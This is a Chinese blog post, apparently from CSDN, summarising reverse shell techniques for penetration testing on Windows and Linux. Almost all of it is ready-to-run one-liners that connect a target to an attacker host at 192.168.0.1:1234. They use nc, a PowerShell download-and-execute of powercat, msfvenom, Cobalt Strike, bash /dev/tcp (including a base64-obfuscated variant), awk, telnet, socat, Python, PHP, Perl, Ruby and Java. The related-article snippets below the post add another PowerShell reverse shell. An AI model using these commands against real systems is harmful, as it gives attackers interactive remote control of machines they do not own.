反弹shell姿势小总结

最新推荐文章于 2023-07-12 23:09:14 发布
最新推荐文章于 2023-07-12 23:09:14 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: shell 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zlirving_/article/details/108747549
版权

在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个可交互式shell。反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。
(本文所有姿势整理自实验笔记与网络)
 

一、Windows反弹shell
0x1 nc反弹
nc 192.168.0.1 1234 -e c:\windows\system32\cmd.exe
0x2 powershell反弹

(现在较为常用,常用来上线cs)
这里通过利用powercat进行反弹shell,powercat是netcat的powershell版本,功能免杀性都要比netcat好用的多。
1、通过远程下载并直接利用反弹木马或者工具

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.0.1 -p 1234 -e cmd

2、下载到目标机器后,本地执行:

Import-Module ./powercat.ps1
powercat -c 192.168.0.1 -p 1234 -e cmd
0x3 通过MSF反弹shell

使用msfvenom生成相关关于powershell反弹的Payload

msfvenom -l payloads | grep 'cmd/windows/reverse'
msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.0.1 LPORT=1234
0x4 通过Cobalt strike反弹shell

1、配置监听器:点击Cobalt Strike——>Listeners——>在下方Tab菜单Listeners,点击add
2、生成payload:点击Attacks——>Packages——>Windows Executable,保存文件位置
3、目标机执行远程下载执行powershell payload进行反弹
 

二、Linux 反弹shell
0x1 bash反弹
bash -i >& /dev/tcp/192.168.0.1/1234 0>&1
base64版:bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMS8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}'
0x2 nc反弹
nc -e /bin/bash 192.168.0.1 1234
0x3 awk反弹

(输入enter则断开)

awk 'BEGIN{s="/inet/tcp/0/192.168.0.1/1234";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)}'
0x4 telnet反弹

(需要在攻击主机上分别监听1234和4321端口,执行反弹shell命令后,在1234终端输入命令,4321查看命令执行后的结果)

telnet 192.168.0.1 1234 | /bin/bash | telnet 192.168.0.1 4321
0x5 socat反弹
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.0.1:1234
0x6 Python反弹
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.1',1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
0x7 PHP反弹
php -r '$sock=fsockopen("192.168.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
0x8 Perl反弹
perl -e 'use Socket;$i="192.168.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
0x9 Ruby反弹
ruby -rsocket -e'f=TCPSocket.open("192.168.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
0x10 JAVA反弹
public class Shell {
    /**
    * @param args
    * @throws Exception 
    */
public static void main(String[] args) throws Exception {
        // TODO Auto-generated method stub
        Runtime r = Runtime.getRuntime();
        String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.1/1234;cat <&5 | while read line; do $line 2>&5 >&5; done"};
        Process p = r.exec(cmd);
        p.waitFor();
    }
}

保存为Shell.java文件,编译执行反弹shell。
javac Shell.java
java Shell
 

 
GOT IT!
更多反弹姿势慢慢学习积累

 
******************************************************
小实验小结,具体测试利用方式需根据具体实践场景~

想冲大厂的癞蛤蟆
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反弹shell小工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
Windows反弹shell测试
oscarli的博客
05-30 285
windows反弹shell测试记录
渗透测试-window反弹shell
lza20001103的博客
05-11 3859
window反弹shell
Windows 反弹shell方法
weixin_53747497的博客
07-12 1994
正向shell : 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell反弹shell):被控端主动发起连接请求去连接控制端,通常被控端 由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送 过来的数据包。
【信息安全】反弹shell
Nicky_Zheng的博客
12-02 199
1、windows-powershell反弹shell kali作为服务端,windows使用powershell连接kali,并将自己的shell给kali windows端 $client = New-Object System.Net.Sockets.TCPClient('192.168.57.200',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($byte
内网渗透之Windows反弹shell(一)
不知名白帽的博客
07-08 1931
内网渗透之Windows反弹shell(一)(反向shell简介、Windows反弹shell
windows反弹shell复现
就是我的博客
04-06 9510
windows反弹shell 简介: reverse shell反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell类似,本质上是网络概念的客户端与服务端的角色反转,就是让目标机执行反向连接攻击机。 在实战中多配置命令执行等漏洞进行使用。 环境: 攻击机:IP为192.168.1.111,系统信息 Linux kali 5.10.0-kali3-amd6...
windows 反弹shell_原创干货 | windows反弹shell小结
weixin_39533896的博客
11-19 1097
前言本文是att&ck Command-Line Interface的展开篇平时遇到rce的漏洞,我们通常会弹一个shell给自己,(提权,内网渗透,搭建跳板,等等)linux反弹shell得益于命令行特别友好,所以我们可以非常简单地就可以把shell弹出来,比如使用bash,perl,python,nc,获得shell的原理其实就是建立了一个socket通道,那么今天我们来看看...
反弹shell的各种姿势(linux与windows
weixin_42478365的博客
06-19 780
在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。 反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。所有姿势整理自网络,假设,攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。 Linux 反弹shell 姿势一:bash反弹 bash -i >& /dev/tcp/192.168.99.242/1234 0>&1 base64版:bash -
windows 反弹shell_反弹shell的各种姿势
weixin_39800331的博客
11-27 408
来自公众号:Bypass在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。本文所有姿势整理自网络,并基于同一个假设的前提下完成测试和验证。(假设:攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。)Linu...
Shell中比较大小简洁总结
09-15
主要介绍了Shell中比较大小简洁总结,本文总结了在shell中比较变量大小的一些方法,需要的朋友可以参考下
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
反弹shell的各种姿势.pdf
最新发布
04-22
价值5999,vip免费阅读,可用于实战拟态,渗透测试学习,资源复现,红蓝对抗,攻防打点,漏洞复现,技术考证、权限维持,应急响应,Hvv实战
GetShell姿势总结1
08-03
3. 解析漏洞 GetShell 1. 站物理路径 2. 件写的权限 3. secure_file_priv 条件没有设置为 NULL
Redis未授权访问之ssh免密登录(踩坑)
Zlirving_的博客
06-29 3992
关于Redis漏洞的详解及写shell、getshell的利用请出示门票:传送门 利用原理 利用 Redis 自身的提供的 config 命令,可以进行写文件操作,攻击者可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件中,进而可以直接使用对应的私钥登录目标服务器。 利用 实验场景 Redis服务器(靶机):Ubuntu 16.4 ----- 192.168.101.46 Redis客户机(攻击机):Ubuntu 16.4 ----- 192.168.
HTA(html应用程序)攻击
Zlirving_的博客
02-23 3560
HTA 介绍 HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件界面没什么差别 大多数的Windows操作系统都支持Hta文件执行,可双击运行hta应用或命令行窗口mshta.exe解析执行文件,这里的.hta文件可以是本地的也可以是可访问的远程主机上的 HTA虽然用HTML、JS和CSS编写,却比普通网页权限大得多。它具有桌面程序的所有权限(读写文件、操作注册表等) HTA
Redis未授权访问之反弹shell
Zlirving_的博客
06-17 1882
Redis简介 Redis 是一个高性能的key-value数据库。为了保证效率,数据都是缓存在内存中。redis会周期性的把更新的数据写入磁盘或者把修改操作写入追加的记录文件,并且在此基础上实现了master-slave(主从)同步   漏洞简介 1、什么是redis未授权访问漏洞 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证,会导致任意
内网渗透之隐藏隧道技术
Zlirving_的博客
05-07 1715
  个人学习笔记及归纳总结,学习内网渗透的必备基础(干货)   隐藏隧道技术即是,绕过端口屏蔽的通信方式 判断内网连通性 imcp ping [ip] tcp nc -zv [ip] [port] http curl 支持文件上传和下载等。linux自带,windows须安装 curl [域名:端口] 设代理 curl -x [proxy-ip:port] [域名] dn...
CS与MSF联动之派生会话
Zlirving_的博客
02-19 1606
CS 派生会话到MSF 当我们CS上线后,先打开msf,启动监听模块 use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost xxxx set lport xxxx exploit 然后在CS新建一个外部监听 两边的payload协议一定要对应的 然后选择需要派生的会话右击—>Spawn然后选择刚刚创建的监听 MSF 派生会话给CS 先在 cs 开启监听,Cobalt Strike-&g
反弹shell无法反弹
08-13
关于您提到的反弹shell无法成功的问题,可能有几个原因导致: 1. 防火墙或安全策略:目标主机可能配置了防火墙或其他安全策略,阻止了反弹shell连接。您可以尝试绕过这些安全策略,例如修改反弹shell的目标端口或...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值